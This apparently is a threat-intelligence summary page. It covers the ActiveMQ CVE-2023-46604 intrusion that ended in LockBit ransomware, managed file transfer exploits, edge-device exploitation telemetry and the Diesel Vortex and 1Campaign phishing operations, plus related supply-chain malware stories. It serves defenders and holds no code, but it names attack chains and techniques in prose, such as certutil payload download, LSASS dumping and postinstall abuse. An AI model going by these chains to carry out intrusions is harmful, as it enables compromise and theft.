Exploitation of Managed File Transfer and Messaging Server Vulnerabilities for Remote Code Execution and Ransomware Deployment
Threat actors continue to prioritize internet-facing infrastructure that provides high-leverage initial access, with multiple reports highlighting active exploitation of remote code execution (RCE) paths in widely deployed services. A DFIR case study described attackers exploiting Apache ActiveMQ CVE-2023-46604 by sending a crafted OpenWire command that forced the broker to load a remote Spring XML configuration, leading to payload retrieval via certutil, rapid privilege escalation to SYSTEM, credential dumping from LSASS, and eventual LockBit ransomware deployment via RDP after re-entry using previously stolen privileged credentials. Separately, incident-response reporting warned of ongoing exploitation against Managed File Transfer (MFT) products, including Gladinet CentreStack (an LFI issue CVE-2025-11371 used in an exploit chain culminating in RCE, patched as CVE-2025-30406) and Fortra GoAnywhere MFT (CVE-2025-10035, improper deserialization leading to RCE), with observed activity linked to a threat group associated with Medusa ransomware.
Broader telemetry and research reinforced that edge and externally exposed services remain the primary battleground for initial access at scale. GreyNoise reported nearly 3 billion malicious sessions against edge infrastructure in 2H 2025, with heavy targeting of enterprise VPNs (notably Palo Alto GlobalProtect) and continued exploitation attempts for older issues such as CVE-2020-2034, alongside pervasive scanning of SSH and remote access services. In parallel, financially motivated and cybercrime-enabling ecosystems are improving their ability to reach victims: Varonis detailed 1Campaign, a cloaking service that helps malicious Google Ads evade review by serving benign pages to scanners while directing real users to phishing/crypto-drainer content, and Have I Been Squatted documented Diesel Vortex, a logistics-focused credential-phishing operation using dozens of domains and an exposed backend repository to support industrialized theft. These trends align with reporting that attackers are increasingly using AI-assisted social engineering and tooling (including deepfakes and AI-generated phishing) and with law-enforcement actions such as Interpol-backed Operation Red Card 2.0, which resulted in 651 arrests and $4.3M recovered from cyber-enabled fraud activity across 16 African countries.
Get ahead of threats like this
Mallory correlates global threat intelligence with your attack surface — know if you’re exposed before adversaries strike.
How this story unfolded
11 events from the most recent confirmed update back to the earliest known activity.
Incident report links ActiveMQ exploitation to LockBit deployment
A public report described how exploitation of CVE-2023-46604 led to enterprise compromise and ransomware deployment, emphasizing the roughly 19-day timeline from initial access to encryption. The report highlighted patching failures, credential hardening, and monitoring for log clearing and remote tool installation as key lessons.
GreyNoise reports edge systems bore the brunt of 2025 exploitation
GreyNoise published findings showing that edge infrastructure was the primary target of internet-wide exploitation attempts in late 2025, with concentrated abuse from a small set of hosting providers and evidence of shared tooling across campaigns. The report also noted that attackers were scanning and enumerating LLM inference servers such as Ollama.
Researchers detail Diesel Vortex credential theft and operator links
Researchers disclosed that the Diesel Vortex campaign had harvested nearly 3,500 credential pairs, including 1,649 unique credentials, and used phishing, vishing, Telegram-channel infiltration, and real-time operator interaction to capture passwords and 2FA codes. OSINT analysis linked the activity to Armenian-language operators and Russian-connected infrastructure and entities.
Varonis reveals 1Campaign cloaking service behind malicious Google Ads
Varonis reported that the 1Campaign cybercrime platform has been helping malicious Google Ads evade detection for at least three years by cloaking content from researchers and automated scanners. The service filters visitors in real time and redirects likely victims to phishing pages and crypto-drainer sites while showing benign pages to others.
Coordinated takedown disrupts parts of Diesel Vortex infrastructure
GitLab, Cloudflare, Google Threat Intelligence, CrowdStrike, and Microsoft Threat Intelligence Center worked together to disrupt portions of the Diesel Vortex phishing infrastructure. The action followed researchers' discovery of exposed backend data, including an SQL database and Telegram webhook logs tied to the operation.
Diesel Vortex phishing campaign begins targeting logistics sector
A financially motivated group dubbed Diesel Vortex began a phishing campaign in September 2025 against freight and logistics organizations in the U.S. and Europe. The operation used dozens of domains and impersonated major freight-industry platforms to steal credentials.
Attackers shift RDP credential spraying toward residential IP space
As part of the broader second-half 2025 activity, credential-spraying campaigns against U.S. RDP services expanded rapidly and increasingly used residential IP addresses, especially from Brazil and Argentina. This shift reduced the effectiveness of traditional reputation- and geo-based blocking.
Internet-wide exploitation surges against edge infrastructure
During the second half of 2025, GreyNoise observed sustained large-scale exploitation attempts against internet-facing edge systems, including VPNs, routers, SSH, and RDP services. The activity totaled nearly 3 billion malicious sessions over 162 days and heavily targeted platforms such as Palo Alto, Cisco, and Fortinet.
LockBit ransomware deployed after ActiveMQ compromise
Following re-entry and lateral movement, the attackers executed LockBit payloads across the enterprise and encrypted systems. Ransom notes pointed victims to the Session messaging app instead of official LockBit infrastructure, suggesting an affiliate or independent actor using the leaked LockBit Black builder.
Attackers re-enter through unpatched ActiveMQ server after eviction
After defenders removed the intruders on the second day of the incident, the still-unpatched ActiveMQ server allowed the same exploit path to be used again 18 days later. The attackers returned, validated domain admin access, conducted discovery, and moved laterally via RDP.
Attackers exploit Apache ActiveMQ flaw to gain initial access
In mid-February 2024, attackers exploited CVE-2023-46604 on an exposed Windows-based Apache ActiveMQ server by forcing it to load a remote Spring XML configuration. They used the access to download a Metasploit stager, escalate privileges, and dump LSASS credentials within about 40 minutes.
Related entities
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
Sources
5 references tracked. Mallory keeps watching after this page renders.
Threat Actors Exploit Apache ActiveMQ Server Vulnerability to Gain RDP Access and Deploy LockBit Ransomware
cybersecuritynews.com
Open sourceEdge systems take the brunt of internet-wide exploitation attempts - Help Net Security
helpnetsecurity.com
Open source1Campaign platform helps malicious Google ads evade detection
bleepingcomputer.com
Open sourcePhishing campaign targets freight and logistics orgs in the US, Europe
bleepingcomputer.com
Open sourceManaged File Transfer Exploits: Here to Stay? - Arete
areteir.com
Open sourceSee the full picture, correlated to your attack surface.
Map indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.
Related stories
Other stories Mallory is tracking that overlap on entities, sources, or topic labels.
Multi-stage phishing and supply-chain malware campaigns targeting credentials and long-term access
Multiple reports highlight active campaigns using *phishing* and *software supply-chain abuse* to steal credentials and establish persistence. eSentire described an espionage-focused operation targeting residents of India with emails impersonating the Income Tax Department, leading victims to a malicious archive that uses DLL side-loading with a legitimate signed Microsoft application, extensive anti-analysis checks, in-memory shellcode unpacking, UAC bypass, and process masquerading; the payload was identified as a **Blackmoon**-family variant that specifically attempts to disable **Avast Free Antivirus** by automating UI interactions to add exclusions. Separately, Aikido reported a malicious npm package (`ansi-universal-ui`) that deploys a multi-stage infostealer (“**G_Wagon**”) by abusing `postinstall` execution, downloading a Python runtime, running an obfuscated payload, and exfiltrating browser credentials, cloud credentials, Discord tokens, and data from 100+ cryptocurrency wallets to an Appwrite storage bucket; it also includes a Windows DLL used for browser-process injection via NT native APIs. In parallel, network-edge exploitation remains a key access vector: Risky Business reported a renewed wave of attacks against **Fortinet FortiGate** devices via a vulnerability Fortinet allegedly “patched” in December but which attackers can still exploit, enabling SSO authentication bypass (via crafted SAML), creation of new admin accounts, and theft of device configuration; mitigations include disabling the FortiCloud SSO feature (not enabled by default). Several other items are general awareness or roundup content rather than specific incident reporting: TechTarget and other blogs emphasized ongoing phishing/email risk (including relay spam abusing legitimate Zendesk instances) and password hygiene, while The Hacker News published a multi-story bulletin that includes (among other items) a spear-phishing campaign in Afghanistan delivering a FALSECUB backdoor via a GitHub-hosted ISO and LNK execution chain; Risky Business also covered Iran’s internet blackout and Starlink jamming/spoofing as a communications-control issue rather than an enterprise cyber incident.
Mar 21, 2026
Security Research Roundup: Supply-Chain Malware, Phishing Operations, and Evolving Social Engineering
Multiple security reports and investigations highlighted active threats spanning software supply chain abuse, phishing operations, and commodity malware delivery. Socket identified **four malicious NuGet packages** (e.g., *NCryptYo*, *DOMOAuth2_*, *IRAOAuth2.0*, *SimpleWriter_*) published by `hamzazaheer` that targeted **ASP.NET** developers by exfiltrating ASP.NET Identity data (users/roles/permissions) and manipulating authorization to maintain persistence; the campaign used a staged loader that set up a local proxy on `localhost:7152` to relay traffic to dynamically resolved C2 infrastructure. Separately, investigators disrupted a logistics-focused **phishing-as-a-service** operation (“**Diesel Vortex**”) tied to Russian/Armenian operators, which used dozens of domains to target users of platforms such as **DAT**, **Truckstop**, **Penske Logistics**, **EFS**, and **Timocom**, resulting in theft of over **1,600 credentials** and attempted **EFS check fraud**. Fortinet also detailed a **multi-stage Agent Tesla** infection chain delivered via phishing with RAR attachments leading to `.jse` and PowerShell stages, culminating in in-memory execution and process hollowing into `C:\Windows\Microsoft.NET\Framework\v4.0.30319\Aspnet_compiler.exe`. Threat intelligence and ecosystem reporting also underscored how attackers are scaling operations and bypassing traditional controls. Group-IB reported **MuddyWater** (“Operation Olalampo”) targeting the **MENA** region with new tooling including **GhostFetch** and a Rust backdoor (**CHAR**) controlled via **Telegram**, plus variants that deploy **AnyDesk**; the report noted indicators consistent with **AI-assisted development**. Dark Reading described the rise of **telephone-oriented attack delivery (TOAD)** emails—messages containing only a phone number—which accounted for a significant share of gateway-bypassing detections in StrongestLayer’s dataset, reflecting a shift toward social-engineering paths that evade link/attachment scanning. Confiant reported disrupting **D-Shortiez** malvertising operations after discovering exposed internal testing/admin infrastructure, attributing **59 million** malicious ad impressions (primarily US-targeted) to scam campaigns, while Interpol-backed **Operation Red Card 2.0** reported **651 arrests** and **$4.3M** recovered across 16 African countries in actions against fraud rings and cybercrime syndicates.
Mar 21, 2026
Mixed threat reporting: APT campaigns, malware delivery via compromised web assets, and ransomware exploitation
The provided items do not describe a single cohesive cybersecurity event; they span multiple unrelated threat reports and opinion pieces. Notable incident-level reporting includes **APT28** activity in Western/Central Europe (“Operation MacroMaze”) using spear-phishing lures with Office macros that beacon via `INCLUDEPICTURE` to `webhook[.]site` and then execute VBScript/CMD/batch stages for persistence and follow-on payload delivery. Separately, **MuddyWater** (Iran/MOIS-linked) was reported running “Operation Olalampo” against organizations in the Middle East and Africa, delivering new custom malware (including a **Char** backdoor using a **Telegram bot** for C2) and, in some cases, attempting exploitation of public-facing servers in addition to phishing. Criminal activity and initial-access tradecraft were also covered across distinct stories: a DFIR case study described exploitation of **Apache ActiveMQ** `CVE-2023-46604` to gain RCE, conduct post-exploitation (Metasploit/Meterpreter, privilege escalation, LSASS access, lateral movement), and ultimately deploy **LockBit**-branded ransomware via RDP using previously stolen credentials (with indications the payload was built using the leaked builder and used *Session* for communications). Multiple reports described malware delivery via compromised web assets and social engineering, including **GrayCharlie** injecting malicious JavaScript into WordPress sites to push **NetSupport RAT**, **Stealc**, and **SectopRAT** via fake updates/ClickFix-style CAPTCHAs, and a separate **ClickFix** campaign delivering a custom C++ RAT (**MIMICRAT**) through fake Cloudflare verification prompts that trick users into running PowerShell. Additional, unrelated threat reporting included a **NuGet** supply-chain attack (typosquatted `NCryptYo` plus companion packages) targeting ASP.NET Identity data and enabling backdoored authorization rules, and malicious Chrome extensions using a “**Promise Bomb**” browser-crash technique to drive users to run fake “CrashFix” PowerShell steps. Several other items were generic commentary/roundups (data breach trends, quantum preparedness, Enigma history, NATO public opinion polling, recon how-to, and a malware-newsletter link list) and do not add event-specific intelligence.
Mar 21, 2026